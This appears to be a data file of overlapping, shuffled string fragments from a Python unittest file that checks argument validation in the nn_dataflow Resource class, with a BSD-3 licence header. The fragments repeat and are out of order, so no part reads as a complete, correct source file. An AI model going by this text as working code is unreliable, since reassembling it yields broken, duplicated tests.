"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region')",
"no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _",
"the BSD-3 License for more details. You should have received a copy of",
"_ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width,",
"dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False,",
".*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128,",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with",
"self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
".*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with",
"published by the Open Source Initiative. This program is distributed in the hope",
"2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region =",
"self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ =",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, )",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with",
"program is free software: you can redistribute it and/or modify it under the",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2),",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'):",
"1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource:",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid",
"origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2,",
"PARTICULAR PURPOSE. See the BSD-3 License for more details. You should have received",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'):",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid",
"dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region,",
"type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0,",
"0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf.",
"test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"you can redistribute it and/or modify it under the terms of the Modified",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self):",
"size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512,",
"self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"of Stanford University This program is free software: you can redistribute it and/or",
"it under the terms of the Modified BSD-3 License as published by the",
"import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region =",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self):",
"'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2,",
".*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, )",
".*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None,",
"''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ =",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): '''",
"type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf,",
"'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8,",
"See the BSD-3 License for more details. You should have received a copy",
".*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512,",
"'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2,",
"131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux')",
"dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16,",
"Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2,",
") def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ =",
"type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self):",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. '''",
"'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid",
"type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region",
"it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty",
"= Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"a copy of the Modified BSD-3 License along with this program. If not,",
"8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. '''",
"without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.",
"def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. '''",
"origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid",
"import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): '''",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type",
"WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR",
"from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for",
"self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False,",
"'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth')",
"(16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth,",
") with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16,",
"received a copy of the Modified BSD-3 License along with this program. If",
"dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with",
"the hope that it will be useful, but WITHOUT ANY WARRANTY; without even",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. '''",
"will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of",
"no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError,",
"Board of Trustees of Stanford University This program is free software: you can",
"''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _",
"'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2,",
"Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"License for more details. You should have received a copy of the Modified",
"'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'):",
".*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128,",
"def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'):",
"''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC),",
"size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
".*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0,",
"test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region,",
"of the Modified BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.",
"with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import",
"1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
") with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region.",
"This program is free software: you can redistribute it and/or modify it under",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, )",
"test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2),",
"program is distributed in the hope that it will be useful, but WITHOUT",
"no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _",
"size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"2016-2019 by The Board of Trustees of Stanford University This program is free",
"DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux.",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): '''",
"\"\"\" $lic$ Copyright (C) 2016-2019 by The Board of Trustees of Stanford University",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2,",
"dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid",
"by The Board of Trustees of Stanford University This program is free software:",
"BSD-3 License as published by the Open Source Initiative. This program is distributed",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region,",
"$lic$ Copyright (C) 2016-2019 by The Board of Trustees of Stanford University This",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region.",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"Copyright (C) 2016-2019 by The Board of Trustees of Stanford University This program",
"PURPOSE. See the BSD-3 License for more details. You should have received a",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource =",
"University This program is free software: you can redistribute it and/or modify it",
